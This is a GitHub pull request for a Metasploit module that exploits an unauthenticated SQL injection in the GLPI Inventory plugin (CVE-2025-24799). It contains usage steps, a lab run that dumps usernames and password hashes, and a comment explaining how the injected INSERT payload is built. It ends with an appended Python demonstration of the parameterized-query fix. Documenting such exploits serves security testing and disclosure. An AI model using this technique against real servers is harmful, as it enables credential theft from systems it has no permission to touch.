
GLPI Inventory Plugin Unauth Blind Boolean SQLi (CVE-2025-24799) #19974

Open · wants to merge 3 commits into base: master
Conversation

jheysel-r7
Contributor

@jheysel-r7 jheysel-r7 commented Mar 19, 2025

GLPI <= 1.0.18 fails to properly sanitize user supplied data when sent inside a SimpleXMLElement (available to unauthenticated users), prior to using it in a dynamically constructed SQL query. As a result, unauthenticated attackers can conduct an SQL injection attack to dump sensitive data from the backend database such as usernames and password hashes.

In order for GLPI to be exploitable the GLPI Inventory plugin must be installed and enabled, and the "Enable Inventory" radio button inside the administration configuration also must be checked.

Verification

  1. Start msfconsole.
  2. Do: use gather/glpi_inventory_plugin_unauth_sqli.
  3. Set the RHOST.
  4. Set MAX_ENTRIES to 1 to speed up module run time for verification.
  5. Run the module.
  6. Receive a table with one username and its corresponding password hash.

Testing

msf6 > use gather/glpi_inventory_plugin_unauth_sqli
msf6 auxiliary(gather/glpi_inventory_plugin_unauth_sqli) > set rhost 172.16.199.130
rhost => 172.16.199.130
msf6 auxiliary(gather/glpi_inventory_plugin_unauth_sqli) > exploit 
[*] Reloading module...
[*] Running module against 172.16.199.130
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable.
[*] Extracting credential information
glpi_users
==========
 name                   password
 ----                   --------
 Plugin_GLPI_Inventory  39
 glpi                   $2y$10$ci01zoEXHWOfoxietd8ry.2K6Y3wR5bc1dZQiftuFM5hqQtPgD6LS
 glpi-system
 normal                 $2y$10$iaxy0646EhwsuBbjAgme4uJN6SN.pbyK.ciTCnep67Wq8x.qt1JvS
 post-only              $2y$10$//Ca44JjRIV/9Hv1IEM1y.v1aEa3FwzytX4QYtKsxyqF/rnOzROei
 tech                   $2y$10$KjaOxGSyd0CMifvDVNiggOxCVHP0g8jER/jLtZsmF54S63LH5GWIy
[*] Auxiliary module execution completed

@jheysel-r7 jheysel-r7 added module docs rn-modules release notes for new or majorly enhanced modules labels Mar 20, 2025

jheysel-r7 commented Mar 20, 2025

I've added the method #verify_extra_columns in order to account for the difference in database schemas across vulnerable versions.

This is what the vulnerable INSERT query looks like on 10.0.17:

INSERT INTO `glpi_agents` (`deviceid`, `name`, `last_contact`, `useragent`, `agenttypes_id`, `itemtype`, `remote_addr`, `items_id`, `threads_networkdiscovery`, `threads_networkinventory`, `timeout_networkdiscovery`, `timeout_networkinventory`) VALUES ('<payload>

In order to make this a valid query we must ensure that we are passing values into all fields in the INSERT statement. The deviceid field is the field vulnerable to SQLi, so it will be an empty string, as the leading single quote of our payload will be the deviceid parameter's closing quote in the query. The next field, name, will contain our blind boolean payload, and after that we must append 10 (for version 10.0.17) values (we will use 0's) in order to construct a valid query.

This is what the vulnerable INSERT query looks like on 10.0.0:

INSERT INTO `glpi_agents` (`deviceid`, `name`, `last_contact`, `useragent`, `agenttypes_id`, `itemtype`, `items_id`) VALUES (''

Note how this INSERT statement requires a different number of values to be inserted in order to make a valid query.

I explored the option of trying to add a version check to avoid the need to brute force this value (by going through the commit history of GLPI and mapping versions to required fields). However, it didn't seem like the version was remotely accessible, and that approach seemed arduous. We have an older GLPI module with a version check, but it no longer works for 10.0.X versions.

I've tested the current solution on versions 10.0.0 and 10.0.17.
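To make the defensive point of the discussion above concrete, here is an added example (not code from this PR, from Metasploit, or from GLPI). It builds an in-memory SQLite stand-in for `glpi_agents` from the two column lists quoted in the comment (the table and its TEXT columns are a constructed model, not GLPI's real schema), then inserts an agent row whose `deviceid` comes from untrusted input using both the vulnerable string-concatenation pattern and a parameterized statement. The unsafe builder breaks on an ordinary apostrophe, which is exactly the property the injection relies on, while the parameterized form stores the value intact and generates one placeholder per column, so the 10.0.0 versus 10.0.17 difference in column count stops being something input can interact with at all.

```python
import sqlite3

# Column lists taken from the two INSERT statements quoted in the PR comment.
# The table created below is a constructed SQLite stand-in, not GLPI's schema.
COLUMNS_10_0_17 = [
    "deviceid", "name", "last_contact", "useragent", "agenttypes_id",
    "itemtype", "remote_addr", "items_id", "threads_networkdiscovery",
    "threads_networkinventory", "timeout_networkdiscovery",
    "timeout_networkinventory",
]
COLUMNS_10_0_0 = [
    "deviceid", "name", "last_contact", "useragent", "agenttypes_id",
    "itemtype", "items_id",
]


def make_db(columns):
    """Create an in-memory glpi_agents stand-in with the given columns."""
    conn = sqlite3.connect(":memory:")
    cols = ", ".join(f'"{c}" TEXT' for c in columns)
    conn.execute(f"CREATE TABLE glpi_agents ({cols})")
    return conn


def build_insert_unsafe(columns, values):
    """The vulnerable pattern: each value is wrapped in single quotes by string
    formatting, so a quote character inside untrusted input becomes part of the
    SQL grammar instead of part of the data."""
    col_list = ", ".join(f'"{c}"' for c in columns)
    val_list = ", ".join(f"'{v}'" for v in values)
    return f"INSERT INTO glpi_agents ({col_list}) VALUES ({val_list})"


def insert_unsafe(conn, columns, values):
    conn.execute(build_insert_unsafe(columns, values))


def insert_safe(conn, columns, values):
    """Hardened form: one '?' placeholder per column and the values passed to
    the driver separately. The statement text never contains user data, and the
    placeholder count follows the schema automatically."""
    if len(values) != len(columns):
        raise ValueError(f"expected {len(columns)} values, got {len(values)}")
    col_list = ", ".join(f'"{c}"' for c in columns)
    placeholders = ", ".join("?" for _ in columns)
    conn.execute(
        f"INSERT INTO glpi_agents ({col_list}) VALUES ({placeholders})", values
    )


def stored_deviceids(conn):
    """Read back whatever deviceid values actually landed in the table."""
    return [row[0] for row in conn.execute("SELECT deviceid FROM glpi_agents")]


def demo(columns, deviceid):
    """Insert one agent row with the given untrusted deviceid using both
    patterns and report what each one stored (or the error it raised)."""
    # Constructed filler values for every column after deviceid.
    values = [deviceid] + ["0"] * (len(columns) - 1)
    result = {}

    conn = make_db(columns)
    try:
        insert_unsafe(conn, columns, values)
        result["unsafe"] = stored_deviceids(conn)
    except sqlite3.OperationalError as exc:
        # A single quote in the input changed the statement's structure.
        result["unsafe"] = f"error: {exc}"

    conn = make_db(columns)
    insert_safe(conn, columns, values)
    result["safe"] = stored_deviceids(conn)
    return result


if __name__ == "__main__":
    # Constructed sample input: a device name containing an apostrophe.
    print(demo(COLUMNS_10_0_17, "O'Brien-laptop"))
    print(demo(COLUMNS_10_0_0, "plain-device-id"))
```

The same `insert_safe` serves both column layouts without change because the placeholders are derived from the column list rather than from the input, which is the property that makes prepared statements the fix regardless of which GLPI version's schema is in play.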
